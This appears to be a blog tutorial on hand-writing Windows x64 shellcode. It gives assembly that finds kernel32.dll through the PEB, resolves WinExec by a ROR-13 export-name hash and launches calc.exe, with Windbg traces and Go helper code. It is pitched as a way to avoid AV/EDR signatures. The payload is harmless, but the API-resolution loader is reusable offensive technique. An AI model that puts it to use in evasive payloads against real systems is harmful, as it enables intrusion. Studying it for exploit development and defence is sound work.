2. Windows x64 Shellcode Development intro

#x64 #shellcode #golang #asm

Introduction

Shellcode is a small piece of code written in assembly language that is used to perform a specific function in the context of a software exploit. The term "shellcode" comes from the idea that the code often opens a shell, providing an attacker with command-line access to a compromised system.

Shellcode is commonly associated with security exploits, especially in the field of cybersecurity and penetration testing. It is often injected into a vulnerable program's memory through various means, such as buffer overflows or other vulnerabilities, to take control of the program's execution flow.

The functionality of shellcode can vary widely, depending on the goals of the attacker. It might include actions like spawning a shell, downloading and executing malicious payloads, or performing other malicious activities.

It's important to note that while shellcode itself is not inherently malicious, it is commonly used as a component of exploits and attacks.

A common tool for generating shellcode is msfvenom. Any payload generated from this tool is heavily signatured by AV/EDR vendors. Being able to write custom shellcode is a great addition to the arsenal of any offensive security professional.

Assembly - Intel Syntax

Throughout this blog post I will be using Intel Syntax. I think it's much easier to read and write. It's also the default syntax for Windbg which is the debugger I will be using for testing my assembly code.

Syntax

Intel syntax follows this convention:

instruction destination, source;

So let's take a a real example. The add command will add the value on the right to the to the value on the left.

add rax,1;

In this case if rax had the value 2 before the command was ran, after execution it will have the value of 3.

Common ASM instructions

InstructionsExplanation

mov rax,1;

Moves value 1 (decimal) to rax. Add 0x in front of the number for hex values

mov rax, qword ptr [r8];

Moves the qword from the location of r8 to rax

add rax,1;

Adds 1 to rax

sub rax,1;

Subtracts 1 from rax

push rax;

Pushes the value of rax to the stack

pop rax;

Pops the first value of the stack into rax;

call rax;

Calls the function at the address stored in rax

jmp rax;

Jumps at the address stored in rax

xor rax,rax;

logical xor, zeros the contents of rax

int3;

breakpoint

The above instructions are the most commonly used when we are writing shellcode. A few others will be used but they will be explained as we walk through the actual code.

Registers

The whole list of registers can be found on microsoft's website. Let's have a quick look on how some of the registers will be used within the shellcode.

Let's take rax as an example.

registersize

rax

64-bit register

eax

32-bit register (lower 32 bits of rax)

ax

16-bit register (lower 16 bits of eax)

ah

8-bit register (higher 8 bits of ax)

al

8-bit register (lower 8 bits of ax)

Let's take r8 as another example

registersize

r8

64-bit register

r8d

32-bit register (lower 32 bits of r8)

r8w

16-bit register (lower 16 bits of r8d)

r8b

8-bit register (lower 8 bits of r8w)

d - double word

w - word

b - byte

A few things to note when using the different variations of these registers. Let's say the following instruction is used:

mov rax, qword ptr [r8];

The source and destination should match in size. We cannot use a 64-bit register as our destination but a 32 bit (dword) as our source. Keystone will not generate the op codes for us.

Shellcode template

A good template I found online when I was looking for one can be found here.

I am not a big fan of python so I ported the above script in go. Also to make it easy for development and debugging I will include the shellcode runner script and automatically launch and attach Windbg Preview.

The ported code can be downloaded from my github page here. If you are more familiar with python you can use the original template from exploitdb and follow along. Only caveat is that you will have to write your own shellcode runner to execute the code.

Objective

With everything we have now in place, let's have a quick look at the code we are trying to execute in a higher level language.

package main

import (
	"syscall"
	"unsafe"

	"golang.org/x/sys/windows"
)

func main() {

	hModule, _ := windows.LoadLibrary("kernel32.dll")

	winexecaddr, _ := windows.GetProcAddress(hModule, "WinExec")

	calcstring, _ := syscall.BytePtrFromString("calc.exe")

	syscall.SyscallN(
		winexecaddr, 
		uintptr(unsafe.Pointer(calcstring)), 
		0x1)
}

From the above code we essentially have 4 lines of code we would like to turn into assembly.

Line 12: Import kernel32.dll

Line14: Get the Process address of WinExec

Line16: Get a Pointer to a null terminated string "calc.exe"

Line 18: Call the Winexec function passing the pointer from line 16 as the first argument and 1 as the second.

Shellcode

Finding kernel32.dll

As mentioned previously the first step of developing our shellcode is to find the base address of kernel32.dll in memory. Kernel32.dll is always loaded in the process memory on creation.

To find the address we have to perform the following tasks.

  1. Get the address of the PEB structure from TEB

  2. From PEB we can get the PEB_LDR_DATA

  3. And from PEB_LDR_DATA we can get InMemoryOrderModuleList

Let's walk through the assembly code in windbg to ensure we get the expected results. We start by adding a breakpoint int3; at the top of our shellcode.

 "find_kernel32:",
 " int3;",
 " xor rdx, rdx;",
 " mov rax, gs:[rdx+0x60];", // RAX stores  the value of ProcessEnvironmentBlock member in TEB, which is the PEB address
 " mov rsi,[rax+0x18];",     // Get the value of the LDR member in PEB, which is the address of the _PEB_LDR_DATA structure
 " mov rsi,[rsi + 0x20];",   // RSI is the address of the InMemoryOrderModuleList member in the _PEB_LDR_DATA structure
 " mov r9, [rsi];",          // Current module is current executable
 " mov r9, [r9];",           // Current module is ntdll.dll
 " mov r9, [r9+0x20];",      // Current module is kernel32.dll
 " jmp call_winexec;",

Get the address of the PEB structure from TEB

Line 3: In the context of Windows, the gs register points to the thread information block (TEB), which contains information about the current thread

In Windbg we can view the structure using the following command

dt nt!_TEB @$teb

We can see that the PEB is located at offset 0x60 from the beginning of the TEB. Once we step over the following instruction we should get the address of PEB in rax

mov     rax,qword ptr gs:[rdx+60h]

A quick sanity check confirms that the value in the rax register matches the one from the TEB.

0:001> r rax
rax=00000009d0110000

From PEB we can get the PEB_LDR_DATA

Line 5: We have the value of PEB in RAX and we now try to get the address of the PEB_LDR_DATA.

We can then use the following command to view the PEB Structure and identify the offset for LDR

dt nt!_PEB 00000009d0110000

As we can see from above the offset to Ldr is 0x18. Let's step over line 5 that has the following instruction to see if we get the address of PEB_LDR_DATA in the RSI register

" mov rsi,[rax+0x18];"

Let's do a quick sanity check using windbg

0:001> p
0000016b`78f8000d 488b7620        mov     rsi,qword ptr [rsi+20h] ds:00007ffc`22ff6400=0000016b52262c80
0:001> r rsi
rsi=00007ffc22ff63e0

Great, we now have the address of the struct in rsi

We can get InMemoryOrderModuleList from PEB_LDR_DATA

Line 6: We now have the PEB_LDR_DATA address in rsi and we want to get the value of InMemoryOrderModuleList to rsi. Let's view the struct in windbg once again to make sure we have the correct offset in our shellcode.

The offset seems to be correct in our code

" mov rsi,[rsi + 0x20];"

Let's step over in our code to see if we get the right value in rsi.

0:001> p
0000016b`78f80011 4c8b0e          mov     r9,qword ptr [rsi] ds:0000016b`52262c80=0000016b52262ae0
0:001> r rsi
rsi=0000016b52262c80

Kernel32 comes after the current executable and ntdll. So moving forward twice should give us the _LDR_DATA_TABLE_ENTRY of kernel32. Let's confirm this.

First Entry ks.exe:

dt _LDR_DATA_TABLE_ENTRY 0x16b52262c80-0x10

Second entry ntdll.dll

Third entry kernel32.dll

We can see from the beginning of the structure the offset to the DllBase is at 0x30. Since we are substructing 0x10 from the r9 register to get to the beginning of the structure we only need to add 0x20 to get the DllBase value.

" mov r9, [r9+0x20];",      

Let's confirm that after stepping over line 9 in our code the register r9 will hold the kernel32.dll base address.

Awesome.. with the address of kernel32 in r9 we can now proceed to get the address of winexec

GetProcAddress

The next step step in our shellcode is to create a function to walk through the exports directory of any given dll (base address) and return the absolute address of the function. Although in this example we will only call it once, in larger and more real world scenarios we will most likely have to call this function multiple times.

"parse_module:",                    // Parsing DLL file in memory
" mov ecx, dword ptr [r9 + 0x3c];", // R9 stores  the base address of the module, get the NT header offset
" xor r15, r15;",
" mov r15b, 0x88;", // Offset to Export Directory
" add r15, r9;",
" add r15, rcx;",
" mov r15d, dword ptr [r15];",        // Get the RVA of the export directory
" add r15, r9;",                      // R14 stores  the VMA of the export directory
" mov ecx, dword ptr [r15 + 0x18];",  // ECX stores  the number of function names as an index value
" mov r14d, dword ptr [r15 + 0x20];", // Get the RVA of ENPT
" add r14, r9;",                      // R14 stores  the VMA of ENPT

"search_function:",  // Search for a given function
" jrcxz not_found;", // If RCX is 0, the given function is not found
" dec ecx;",         // Decrease index by 1
" xor rsi, rsi;",
" mov esi, [r14 + rcx*4];", // RVA of function name string
" add rsi, r9;",            // RSI points to function name string

"function_hashing:", // Hash function name function
" xor rax, rax;",
" xor rdx, rdx;",
" cld;", // Clear DF flag

"iteration:",        // Iterate over each byte
" lodsb;",           // Copy the next byte of RSI to Al
" test al, al;",     // If reaching the end of the string
" jz compare_hash;", // Compare hash
" ror edx, 0x0d;",   // Part of hash algorithm
" add edx, eax;",    // Part of hash algorithm
" jmp iteration;",   // Next byte

"compare_hash:", // Compare hash
" cmp edx, r8d;",
" jnz search_function;",               // If not equal, search the previous function (index decreases)
" mov r10d, [r15 + 0x24];",            // Ordinal table RVA
" add r10, r9;",                       // Ordinal table VMA
" movzx ecx, word ptr [r10 + 2*rcx];", // Ordinal value -1
" mov r11d, [r15 + 0x1c];",            // RVA of EAT
" add r11, r9;",                       // VMA of EAT
" mov eax, [r11 + 4*rcx];",            // RAX stores  RVA of the function
" add rax, r9;",                       // RAX stores  VMA of the function
" ret;",
"not_found:",
" ret;",

Let's break the code down into smaller pieces to understand exactly what's happening.

parse_module

"parse_module:",                    // Parsing DLL file in memory
" mov ecx, dword ptr [r9 + 0x3c];", // R9 stores  the base address of the module, get the NT header offset
" xor r15, r15;",
" mov r15b, 0x88;", // Offset to Export Directory
" add r15, r9;",
" add r15, rcx;",
" mov r15d, dword ptr [r15];",        // Get the RVA of the export directory
" add r15, r9;",                      // R15 stores  the VMA of the export directory
" mov ecx, dword ptr [r15 + 0x18];",  // ECX stores  the number of function names as an index value
" mov r14d, dword ptr [r15 + 0x20];", // Get the RVA of ENPT
" add r14, r9;",                      // R14 stores  the VMA of ENPT

The parse_module function expects 2 values from the caller:

  • R9 -> should hold the base address of the dll

  • R8d -> should have the hash of the function (more on this later)

Line 2: The offset value to the beginning of the nt header is moved to ecx

PE-bear is an excellent tool that can be used to cross check if the values we see in windbg are indeed the right ones.

Let's step over the code in line 2 to make sure we are getting the correct result. The value we expect to see in ecx is E8.

0:010> t
000001f8`6d17001d 418b493c        mov     ecx,dword ptr [r9+3Ch] ds:00007ffc`2127003c=000000e8
0:010> p
000001f8`6d170021 4d31ff          xor     r15,r15
0:010> r ecx
ecx=e8

Lines 3-7: What happens on these lines is basically the following calculation

NtHeader = DllBase + 0xE8

Export Directory = NtHeader + 0x88

0:010> ?e8+0x88
Evaluate expression: 368 = 00000000`00000170

From a quick calculation we can see that Export directory is at offset 0x170 from the base address. Let's check in PE Bear if that offset points to the export directory in PE Bear

We can see that the offset 0x170 points to the RVA of the export directory.

Let's walk over the following instruction in windbg to ensure that r15 holds the RVA value we expect to see

" mov r15d, dword ptr [r15];",   

When we move a dword in the lower 32-bits of a register, the higher 32-bits are filled with 0s.

This is not the case when we move a value into the lower 16-bits of the register.

0:010> r r15
r15=000000000009e750

We can now add r9 which holds the dllBase address to calculate the absolute address of the Export directory.

" add r15, r9;",        

In windbg we can confirm that we are indeed pointing to the right location by viewing the first two double words.

0:010> r r15; dd r15 L2
r15=00007ffc2130e750
00007ffc`2130e750  00000000 2e35230e

We can see the value of Characteristics (00000000 ) and ReproChecksum (2e35230e)

" mov ecx, dword ptr [r15 + 0x18];",  // ECX stores  the number of function names as an index value
" mov r14d, dword ptr [r15 + 0x20];", // Get the RVA of ENPT
" add r14, r9;",                      // R14 stores  the VMA of ENPT

The last 3 lines store the number of function names in ecx and the address of names in r14.

0:010> r ecx
ecx=687
0:010> dd r14
00007ffc`21310194  000a28cb 000a2904 000a2937 000a2946
00007ffc`213101a4  000a295b 000a2980 000a2989 000a2992
00007ffc`213101b4  000a29a3 000a29b4 000a29f9 000a2a1f

A quick look in PE-bear reveals that we have the right values in both ecx, and r14. We can see that the first value at r14 is the same as the first Name RVA below.

search_function

"search_function:",  // Search for a given function
" jrcxz not_found;", // If RCX is 0, the given function is not found
" dec ecx;",         // Decrease index by 1
" xor rsi, rsi;",
" mov esi, [r14 + rcx*4];", // RVA of function name string
" add rsi, r9;",            // RSI points to function name string
.
.
.
"not_found:",
" ret;",

The functionality of this code is fairly simple.

Line 2: checks if ecx = 0 and if it is it jumps to line 10 that terminates the execution of our shellcode. When ecx is 0 it means that our shellcode went through the whole export list without finding the requested function.

Line3: Decrements ecx by 1 for every iteration

Line4: zeros rsi

Line 5: For the first iteration the last Export RVA is moved to esi

Line 6: Adds base address to RVA to get absolute value in rsi

The second time the loop reaches this point this is the output from Windbg

000001f8`6d170049 4c01ce          add     rsi,r9
0:010> r rsi
rsi=00000000000ad02a
0:010> p
000001f8`6d17004c 4831c0          xor     rax,rax
0:010> db rsi
00007ffc`2131d02a  75 61 77 5f 77 63 73 6c-65 6e 00 75 61 77 5f 77  uaw_wcslen.uaw_w
00007ffc`2131d03a  63 73 72 63 68 72 00 00-00 00 f0 f0 0a 00 00 00  csrchr..........

It matches the exported functions from PE-bear

function_hashing

The shellcode author in this case came up with a smart algorithm that generates a hash based on the Function name. It then compares the generated hash with the hash we provide it. The caveat of that is that we have to write a piece of code to calculate that hash for us.

"function_hashing:", // Hash function name function
" xor rax, rax;",
" xor rdx, rdx;",
" cld;", // Clear DF flag

"iteration:",        // Iterate over each byte
" lodsb;",           // Copy the next byte of RSI to Al
" test al, al;",     // If reaching the end of the string
" jz compare_hash;", // Compare hash
" ror edx, 0x0d;",   // Part of hash algorithm
" add edx, eax;",    // Part of hash algorithm
" jmp iteration;",   // Next byte

Lines 1-4 : Zero rax & rdx and clear DF flag

The iteration code is where the hashing happens.

Line 6: loadsb takes the first byte from the address pointed to by the RSI and write is to the lowest byte of rax (al)

Lines 8-9: Checks if the value is 0 that indicates the end of the string and jumps to the next function

Line 10: The x86-64 assembly instruction ror edx, 0x0d performs a "rotate right" operation on the contents of the edx register. In this case, the rotation is by 13 bits (0x0d in hexadecimal is 13 in decimal).

Imagine edx could only hold 4 bits. Here is an example of the ror effect after rotating right 1 bit.

edx =  0101
ror edx, 0x01
edx= 1010

Line 11: Adds eax to edx

Line 12: Loops to the next byte

compare_hash

"compare_hash:", // Compare hash
" cmp edx, r8d;",
" jnz search_function;",               // If not equal, search the previous function (index decreases)
" mov r10d, [r15 + 0x24];",            // Ordinal table RVA
" add r10, r9;",                       // Ordinal table VMA
" movzx ecx, word ptr [r10 + 2*rcx];", // Ordinal value -1
" mov r11d, [r15 + 0x1c];",            // RVA of EAT
" add r11, r9;",                       // VMA of EAT
" mov eax, [r11 + 4*rcx];",            // RAX stores  RVA of the function
" add rax, r9;",                       // RAX stores  VMA of the function
" ret;",

The last part of the code is where the actual comparison takes place with the provided hash. Our hash will be located in r8d.

Line 2: Compares calculated hash from the previous function with the one we provided

Line 3: If they are not equal it jumps back to our search_function loop to get the next entry.

Lines 4-10 Only execute if the provided and calculated hashes match

Line 4: r15 holds the address of the export directory. The offset 0x24 points to the AddressOfNameOrdinals

000001f8`6d170064 458b5724        mov     r10d,dword ptr [r15+24h] ds:00007ffc`2130e774=000a1bb0
0:010> p
000001f8`6d170068 4d01ca          add     r10,r9
0:010> r r10
r10=00000000000a1bb0

Line 5: Adds base address to the RVA to get absolute address of the Address of name ordinal

Line 6: Adds the ordinal value of the function above the desired one in ecx

0:010> r ecx
ecx=638

As we can see the ordinal value in ecx is pointing to the function WideCharToMultiByte

The ordinal value of WinExec is 639.

Lines 7-8: Point to the addresses of functions. That 's the value we need to call the function.

Line 9: Gets the RVA of the address of function for WinExec in eax

0:010> r eax
eax=68660

Comparing with the previous screenshot we can see that it's a match

Line 10: We add the base address and we have the function in the rax register ready to be called as needed.

Helper code for hash calculation

If you made it to this point, you are probably wondering how can you calculate the hash and provide it to the assembly code.

The following code will calculate and print the hash for us:

package main

import (
	"fmt"
	"math/bits"
)

func main() {

	funcName := "WinExec"
	fmt.Printf("Function Name: %s , Function Hash: 0x%x", funcName, HashCalculator(funcName))

}

func HashCalculator(funcName string) uint32 {

	var hash uint32 = 0
	// Convert string to byte slice
	byteSlice := []byte(funcName)

	for _, byte := range byteSlice {
		hash = bits.RotateLeft32(hash, -0x0d)
		hash += uint32(byte)

	}
	return hash
}

Call the WinExec function

"call_winexec:",
"    mov r8d, 0xe8afe98;", // WinExec Hash
"    call parse_module;",  // Search and obtain address of WinExec
"    xor rcx, rcx;",
"    push rcx;",                    // \0
"    mov rcx, 0x6578652e636c6163;", // exe.clac
"    push rcx;",
"    lea rcx, [rsp];", // Address of the string as the 1st argument lpCmdLine
"    xor rdx,rdx;",
"    inc rdx;", // uCmdShow=1 as the 2nd argument
"    sub rsp, 0x28;",
"    call rax;", // WinExec

We now reach the end of our code.

Referring back to the original go code we need to get a pointer to a null terminated string, in this example a pointer to 'calc.exe' and then call the function.

Line 2: we can use the helper code to calculate the function hash:

Function Name: WinExec , Function Hash: 0xe8afe98

We then feed the value to r8d.

Line 3: We call the parse_module function. if everything went well rax will have the address of the function

Great, we now only have to pass the arguments to the function.

It's a good place to pause now and have a quick look on the x64 calling convention. When calling a function in x64 the first four arguments will go to the registers rcx,rdx,r8,r9 and all the rest to the stack from right to left. So the last argument should be pushed to the stack first and so on.

A great source of information is Microsoft's website.

With this knowledge let's pass the arguments to WinExec.

UINT WinExec(
  [in] LPCSTR lpCmdLine,
  [in] UINT   uCmdShow
);

So WinExec definition from microsoft states that that the first argument should be the a pointer to the null terminated string.

Lines 4-8:

Line 4: zero -> rcx

Line 5: push 0 to the stack. This will act as the null termination

Line 6: The hex values of calc.exe are moved to rcx

To convert ascii to hex I am using this online converter https://www.rapidtables.com/convert/number/ascii-to-hex.html

calc.exe = 63 61 6C 63 2E 65 78 65 + 00

"    mov rcx, 0x6578652e636c6163;", // exe.clac

Be careful when the bytes are pushed into the stack the order will be reversed, so the bytes should be written in the register in reverse order as shown above.

Also the register can only hold 8-bytes so if the string is longer we will need to go through this process multiple times until the whole string is stored

Line 7: Pushes the string to the stack

Line 8: Get a pointer to the string in the rcx register. ( first argument)

Lines 9-10: zero rdx and inc by 1.

Line 11: Argument storage space ( shadow space) and stack alignment

Line 12: Finally calling the function.

0:010> r rcx,rdx
rcx=0000001ea51ff9d8 rdx=0000000000000001
0:010> da 0000001ea51ff9d8
0000001e`a51ff9d8  "calc.exe"

Just before calling the function this is what we see in rcx,rdx which is exactly what we expect.

Stepping over the function should launch a calc.exe process

The whole shellcode template can be found here.

Last updated